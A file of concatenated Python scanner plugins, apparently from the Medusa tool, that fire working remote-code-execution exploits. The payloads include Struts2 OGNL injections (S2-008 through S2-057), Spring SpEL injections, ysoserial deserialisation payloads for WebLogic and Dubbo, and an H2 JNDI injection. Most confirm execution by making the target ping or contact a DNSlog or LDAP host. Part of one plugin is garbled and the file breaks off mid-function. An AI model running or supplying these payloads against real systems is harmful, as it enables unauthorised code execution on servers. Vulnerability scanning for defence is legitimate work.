def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(
DL.dns_host())
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
url, resp.text, DL.dns_host(), str(DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(**kwargs) -> None:
Url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
JrmpPort = "2000" #端口随便
JrmpClient = "JRMPClient"
YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
TempPath = GetTempFilePath().Result() + str(int(
time.time())) + "_" + randoms().result(10)
con, payload = exploit(url, port, YsoserialPath, DL.dns_host(),
JrmpPort, JrmpClient, TempPath)
time.sleep(5)
if DL.result():
Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(
url, payload, con, DL.dns_host(), DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
dns = Dnslog()
YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
subprocess.Popen([
"java", "-jar", YsoserialPath, "CommonsCollections5",
"ping " + dns.dns_host()
],
stdout=subprocess.PIPE)
time.sleep(5)
if dns.result():
Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(
url, scheme + "://" + url + ":" + str(port), dns.dns_host(),
dns.dns_text())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") #获取传入的url参数
Headers = kwargs.get("Headers") #获取传入的头文件
proxies = kwargs.get("Proxies") #获取传入的代理参数
try:
dns = Dnslog()
YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
subprocess.Popen([
"java", "-jar", YsoserialPath, "CommonsCollections5",
"ping " + dns.dns_host()
],
stdout=subprocess.PIPE)
time.sleep(5)
if dns.result():
Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(
url, url, dns.dns_host(), dns.dns_text())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, "", **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL = Dnslog()
payload = """?age=medusa&name=%28%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29%29%28meh%29&z%5B%28name%29%28%27meh%27%29%5D=true""".format(
DL.dns_host())
try:
payload_url = url + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
time.sleep(3)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-009)\r\n漏洞详情:\r\n版本号:S2-009\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, payload_url, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/h2-console/login.do?jsessionid="
payload_url = scheme + "://" + url + ":" + str(
port) + payload + "ad3ae393781ccf8d7abf0345aa88e398"
jsession = requests.get(
payload_url,
timeout=5,
proxies=proxies,
verify=False,
headers=Headers,
)
global pgroups
preg = re.compile(r"login\.jsp\?jsessionid=(.*?)'", re.S)
pgroups = re.findall(preg, jsession.text)
if not pgroups:
preg = re.compile(r"admin\.do\?jsessionid=(.*?)\"", re.S)
pgroups = re.findall(preg, jsession.text)
payload_url2 = scheme + "://" + url + ":" + str(
port) + payload + pgroups[0]
Headers2 = Headers
Headers2['Content-Type'] = 'application/x-www-form-urlencoded'
Headers2['Referer'] = payload_url2
DL = Dnslog()
data = "language=en&setting=Generic+JNDI+Data+Source&name=Generic+JNDI+Data+Source&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F{}%2FExploit&user=&password="******"{}存在SpringBootH2数据库JNDI注入漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
url, resp.text, DL.dns_host(), str(DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port, path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
con = ""
data = b"""-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00"
Content-Type: text/plain
x
-----------------------------735323031399963166993862150--
"""
try:
payload_url = scheme + "://" + url + ":" + str(port) + path
Headers["Content-Length"] = "10000000"
Headers[
"Content-Type"] = "multipart/form-data; boundary=---------------------------735323031399963166993862150"
try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,
headers=Headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
except Exception as e:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-046)\r\n漏洞详情:\r\n版本号:S2-046\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, data, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port, path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
con = ""
payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + "ping%20" + DL.dns_host(
) + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
payload2 = "%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + "ping%20" + DL.dns_host(
) + "%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/"
for payload in [payload1, payload2]:
try:
path1 = os.path.split(path)[0]
path2 = os.path.split(path)[1]
payload_url = scheme + "://" + url + ":" + str(
port) + path1 + "/" + payload + path2
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
try: # 防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False,
allow_redirects=False)
con = resp.text
except:
pass
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-057)\r\n漏洞详情:\r\n版本号:S2-057\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, payload_url, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port, path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
con = ""
payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(
DL.dns_host())
try:
payload_url = scheme + "://" + url + ":" + str(port) + path + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, payload_url, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port, path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
con = ""
payload = """?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(
DL.dns_host())
try:
payload_url = scheme + "://" + url + ":" + str(port) + path + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, payload_url, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
data = """username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx""" % DL.dns_host(
)
payload = "/users?page=&size=5"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": payload_url
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
url, resp.text, DL.dns_host(), str(DL.dns_text()))
print(Medusa)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(**kwargs) -> None:
Url = kwargs.get("Url") #获取传入的url参数
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
client = DubboClient(url, int(port))
JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://" + DL.dns_host(),
strMatchColumns=["foo"])
JdbcRowSetImplClass = new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl)
resp = client.send_request_and_return_response(
service_name=
'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
# 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
method_name='$invoke',
args=[toStringBean])
time.sleep(3)
if DL.result():
Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(
url, DL.dns_text(), DL.dns_host(), str(resp))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port, path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
payload = """?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22ping%20{}%22%29)""".format(
DL.dns_host())
try:
payload_url = scheme + "://" + url + ":" + str(port) + path + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
time.sleep(3)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-008)\r\n漏洞详情:\r\n版本号:S2-008\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, payload_url, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
if proxies != None:
proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(
proxies)
socks.set_default_proxy(socks.HTTP,
addr=proxies_url,
port=proxies_port) # 设置socks代理
socket.socket = socks.socksocket # 把代理应用到socket
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
JrmpPort = "2000" #端口随便
JrmpClient = "JRMPClient"
YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
TempPath = GetTempFilePath().Result() + str(int(
time.time())) + "_" + randoms().result(10)
con, payload = exploit(url, port, YsoserialPath, DL.dns_host(),
JrmpPort, JrmpClient, TempPath)
time.sleep(5)
if DL.result():
Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(
url, payload, con, DL.dns_host(), DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
DL = Dnslog()
payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(
DL.dns_host())
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
url, resp.text, DL.dns_host(), str(DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL = Dnslog()
con = ""
global resp
try:
payload_url = url
Headers[
"Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping " + DL.dns_host(
) + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, resp.request.headers, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
DL=Dnslog()
data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()
payload ="/users?page=&size=5"
payload_url = url + payload
Headers["Content-Type"]="application/x-www-form-urlencoded"
Headers["Referer"]=payload_url
resp = requests.post(payload_url,data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
con=""
payload = '/org.apache.dubbo.samples.http.api.DemoService'
payload_url = scheme + "://" + url + ":" + str(port) + payload
DL=Dnslog()
JrmpClient = "CommonsCollections4"
YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10)
data=generate_payload(YsoserialPath, "ping "+DL.dns_host(), JrmpClient,TempPath)
headers = {
'User-Agent': RandomAgent,
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
try:
resp = requests.post(payload_url,data=data,headers=headers, proxies=proxies, timeout=6, verify=False)
con = resp.text
except:
pass
if DL.result():
